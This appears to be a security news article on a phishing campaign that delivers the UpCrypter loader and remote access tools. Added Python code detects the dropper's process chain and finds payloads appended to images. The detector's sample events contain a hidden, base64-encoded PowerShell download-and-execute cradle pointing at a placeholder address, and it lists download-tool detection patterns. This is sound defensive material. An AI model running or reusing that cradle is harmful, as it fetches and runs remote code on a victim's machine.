A global phishing campaign is underway, targeting Windows users with deceptive emails that lead to the UpCrypter malware loader. The campaign, identified by cybersecurity researchers, aims to give attackers remote control over compromised systems worldwide.
Fortinet’s FortiGuard Labs has been actively tracking the UpCrypter activity. UpCrypter functions as a loader, designed to install various remote access tools (RATs). These tools enable malicious actors to maintain persistent access to infected machines, posing a significant threat to data security and system integrity.
The phishing emails are crafted to look like legitimate notifications, typically missed-voicemail alerts or purchase orders. Recipients who open the attachments are redirected to fraudulent websites that mimic trusted platforms, frequently incorporating the target company's logo to add credibility and convince users they are dealing with a legitimate entity.
According to Fortinet, these deceptive web pages prompt users to download a ZIP file. This file contains a heavily obfuscated JavaScript dropper, which initiates the malware infection process. Upon execution, the JavaScript dropper triggers PowerShell commands in the background. These commands establish connections to attacker-controlled servers, facilitating the download and execution of subsequent stages of the malware.
Cara Lin, a Fortinet FortiGuard Labs researcher, stated, “These pages are designed to entice recipients into downloading JavaScript files that act as droppers for UpCrypter.” This highlights the deceptive nature of the attack and the importance of user vigilance in identifying and avoiding such threats.
Once executed, UpCrypter scans the system for signs of a sandbox environment or forensic tools of the kind security researchers use to analyze malware. If any are detected, it attempts to thwart analysis by forcing a system reboot, which cuts the investigation short. The forced reboot is itself an observable artifact: a restart initiated from a script-host or PowerShell process chain is a useful detection signal.
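The process chain described above (a JavaScript file run by a Windows script host, which spawns PowerShell to fetch the next stage, and which forces a reboot when analysis tooling is found) is what an endpoint detection rule should key on. The following is an added illustration of that logic, not Fortinet's code or anything from the campaign itself. It assumes Sysmon-style process-creation records (EventID 1 field names: ProcessId, ParentProcessId, Image, CommandLine); the sample events are constructed, and the address 203.0.113.10 is a documentation-range placeholder rather than a real indicator.

```python
"""Process-chain detection for a script-host dropper that spawns PowerShell.

Added illustration, not Fortinet's or the campaign's code. Events are constructed
Sysmon-style process-creation records (ProcessId, ParentProcessId, Image,
CommandLine); 203.0.113.10 is a documentation-range placeholder, not a real C2.
"""
import base64
import re
from typing import Dict, Iterator, List

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
SCRIPT_FILE = re.compile(r"\.(js|jse|vbs|vbe|wsf)\b", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Net\.WebClient|Invoke-WebRequest|"
    r"\biwr\b|Invoke-RestMethod|\birm\b|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.IGNORECASE,
)
# shutdown /r (restart) or /s (power off), or the PowerShell cmdlet equivalents
FORCED_REBOOT = re.compile(r"shutdown(\.exe)?\s+[/-][rs]\b|Restart-Computer|Stop-Computer", re.IGNORECASE)
ENCODED_ARG = re.compile(r"[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Expand -EncodedCommand (base64 of UTF-16LE) so a cradle hidden inside it is visible."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return cmdline


def is_script_dropper(event: dict) -> bool:
    """wscript/cscript executing a script file: the launch point of the dropper."""
    return basename(event["Image"]) in SCRIPT_HOSTS and bool(SCRIPT_FILE.search(event["CommandLine"]))


def ancestors(event: dict, by_pid: Dict[int, dict]) -> Iterator[dict]:
    """Walk ParentProcessId links upward, guarding against loops from PID reuse."""
    seen = set()
    pid = event["ParentProcessId"]
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        yield by_pid[pid]
        pid = by_pid[pid]["ParentProcessId"]


def detect(events: List[dict]) -> Dict[int, List[str]]:
    """Return {ProcessId: [rule names]} for processes descended from a script dropper."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings: Dict[int, List[str]] = {}
    for e in events:
        if not any(is_script_dropper(a) for a in ancestors(e, by_pid)):
            continue  # only processes launched (directly or indirectly) by the dropper matter here
        img = basename(e["Image"])
        cmd = decode_encoded_command(e["CommandLine"])
        parent = by_pid.get(e["ParentProcessId"])
        rules = []
        if img in POWERSHELL and parent is not None and is_script_dropper(parent):
            rules.append("script_host_spawned_powershell")  # JS dropper handing off to PowerShell
        if img in POWERSHELL and DOWNLOAD_CRADLE.search(cmd):
            rules.append("download_cradle")  # next-stage fetch from an attacker server
        if (img == "shutdown.exe" or img in POWERSHELL) and FORCED_REBOOT.search(cmd):
            rules.append("forced_reboot_in_script_chain")  # the anti-analysis reboot
        if rules:
            findings[e["ProcessId"]] = rules
    return findings


# Constructed sample: explorer -> wscript Order.js -> powershell (encoded cradle) -> shutdown /r
_STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.txt')"
ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ProcessId": 100, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 200, "ParentProcessId": 100, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\victim\Downloads\PO-2025\Order.js"'},
    {"ProcessId": 300, "ParentProcessId": 200, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    {"ProcessId": 400, "ParentProcessId": 300, "Image": r"C:\Windows\System32\shutdown.exe",
     "CommandLine": "shutdown.exe /r /t 0 /f"},
    # benign admin PowerShell started from the desktop, not via a script host: must not fire
    {"ProcessId": 500, "ParentProcessId": 100, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
]

if __name__ == "__main__":
    for pid, rules in detect(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```

The ancestry walk is what keeps the benign PowerShell instance (PID 500) quiet: the download-cradle and reboot rules only apply to processes that descend from a script host running a script file, so ordinary administrative PowerShell does not trip them. Decoding -EncodedCommand before matching matters because the cradle strings are otherwise invisible in the raw command line.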
If no monitoring tools are detected, UpCrypter downloads and executes additional payloads. In some instances the attackers use steganography, concealing these payloads inside seemingly innocuous image files, which antivirus engines are less likely to inspect for embedded code; this increases the likelihood of a successful infection.
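Fortinet's write-up does not say how the image-borne payloads are embedded, so the following added example (not Fortinet's code) checks only the simplest and most common variant, which is an assumption here: a payload appended after the PNG IEND chunk or the JPEG EOI marker, where image viewers ignore it and file-type-based scanning may skip it. It walks the image structure rather than searching for the last terminator bytes, so a payload that itself contains 0xFFD9 does not hide the boundary. The PNG and JPEG samples are constructed, structurally minimal files.

```python
"""Find data appended past an image's end-of-image marker (added illustration, not Fortinet's code).

Assumes the append-after-terminator variant of image-borne payloads; the PNG and
JPEG bytes built below are constructed, structurally minimal samples.
"""
import re
import struct
import zlib
from typing import Optional, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8"


def png_end_offset(data: bytes) -> Optional[int]:
    """Walk PNG chunks (length, type, data, CRC) and return the offset just past IEND."""
    off = len(PNG_SIG)
    while off + 8 <= len(data):
        length = int.from_bytes(data[off:off + 4], "big")
        ctype = data[off + 4:off + 8]
        off += 12 + length
        if ctype == b"IEND":
            return off
    return None


def _is_real_marker(data: bytes, off: int) -> bool:
    """0xFF followed by neither a stuffing 0x00 nor a restart marker (0xD0-0xD7)."""
    return data[off] == 0xFF and data[off + 1] != 0x00 and not 0xD0 <= data[off + 1] <= 0xD7


def jpeg_end_offset(data: bytes) -> Optional[int]:
    """Walk JPEG segments and return the offset just past the first genuine EOI.

    Segments with a length field (APPn, DQT, SOF, ...) are skipped whole, so an EOI
    inside an EXIF thumbnail is never seen; entropy-coded data after SOS is skipped
    marker-aware; an 0xFFD9 inside the appended payload is never reached."""
    if not data.startswith(JPEG_SOI):
        return None
    off = 2
    while off + 2 <= len(data):
        if data[off] != 0xFF:
            return None  # not where a marker should be: malformed
        marker = data[off + 1]
        if marker == 0xD9:  # EOI
            return off + 2
        if marker == 0xFF:  # fill byte
            off += 1
            continue
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # standalone markers, no length field
            off += 2
            continue
        if off + 4 > len(data):
            return None
        off += 2 + int.from_bytes(data[off + 2:off + 4], "big")  # marker + segment (length incl.)
        if marker == 0xDA:  # SOS: skip entropy-coded data up to the next real marker
            while off + 1 < len(data) and not _is_real_marker(data, off):
                off += 1
    return None


def trailing_payload(data: bytes) -> Optional[Tuple[str, bytes]]:
    """(format, bytes after the terminator) for PNG/JPEG input; None if unrecognised or malformed."""
    if data.startswith(PNG_SIG):
        fmt, end = "png", png_end_offset(data)
    elif data.startswith(JPEG_SOI):
        fmt, end = "jpeg", jpeg_end_offset(data)
    else:
        return None
    return None if end is None else (fmt, data[end:])


def classify_payload(payload: bytes) -> str:
    """Rough triage of what was appended: PE, base64 text, plain text or opaque binary."""
    if not payload:
        return "none"
    if payload.startswith(b"MZ"):
        return "pe"
    if len(payload) >= 64 and re.fullmatch(rb"[A-Za-z0-9+/=\r\n]+", payload):
        return "base64"
    if all(32 <= b < 127 or b in (9, 10, 13) for b in payload):
        return "text"
    return "binary"


# --- constructed samples -----------------------------------------------------
def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def build_png(payload: bytes = b"") -> bytes:
    """1x1 8-bit grayscale PNG, optionally with a payload appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIG + _png_chunk(b"IHDR", ihdr) + _png_chunk(b"IDAT", idat) + _png_chunk(b"IEND", b"") + payload


def build_jpeg(payload: bytes = b"") -> bytes:
    """Structurally minimal JPEG (SOI, APP0, SOS, stuffed entropy bytes, EOI); not a decodable picture."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    entropy = b"\x12\x34\xff\x00\x56"  # 0xFF00 is a stuffed 0xFF, not a marker
    return JPEG_SOI + app0 + sos + entropy + b"\xff\xd9" + payload


if __name__ == "__main__":
    for name, blob in (("clean.png", build_png()), ("stego.jpg", build_jpeg(b"MZ\x90\x00" + b"\xff\xd9" * 4))):
        hit = trailing_payload(blob)
        print(name, hit and (hit[0], len(hit[1]), classify_payload(hit[1])))
```

In a mail gateway or sandbox pipeline this check runs on every image fetched by a process already under suspicion; a non-empty trailer is a strong signal regardless of what the triage function labels it, since a well-formed image has nothing after its terminator. It will not catch least-significant-bit embedding or payloads stored inside valid chunks, which need format-specific statistics instead.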
The final stage of the attack involves the deployment of several malware variants, including:
- PureHVNC: a hidden-VNC (HVNC) tool that gives attackers a remote desktop session invisible to the logged-in user, enabling them to act on the system without the user's knowledge.
- DCRat (DarkCrystal RAT): A multi-functional remote access tool used for spying and data exfiltration. This RAT allows attackers to steal sensitive information and monitor user activity.
- Babylon RAT: This RAT provides attackers with complete control over the infected device, allowing them to execute commands, access files, and perform other malicious activities.
Fortinet researchers have observed that the attackers utilize various methods to conceal their malicious code. These include string obfuscation, modification of registry settings for persistence, and in-memory code execution to minimize the footprint on the disk and evade detection.
The phishing campaign has been active since early August 2025 and exhibits a global reach. High volumes of activity have been observed in Austria, Belarus, Canada, Egypt, India, and Pakistan. The sectors most affected by this campaign include manufacturing, technology, healthcare, construction, and retail/hospitality. Data suggests the rapid proliferation of this threat, with detections doubling within a two-week period.
This attack is designed for long-term persistence, delivering a chain of malware that remains hidden within corporate systems. Fortinet advises, “Users and organizations should take this threat seriously, use strong email filters, and make sure staff are trained to recognize and avoid these types of attacks.”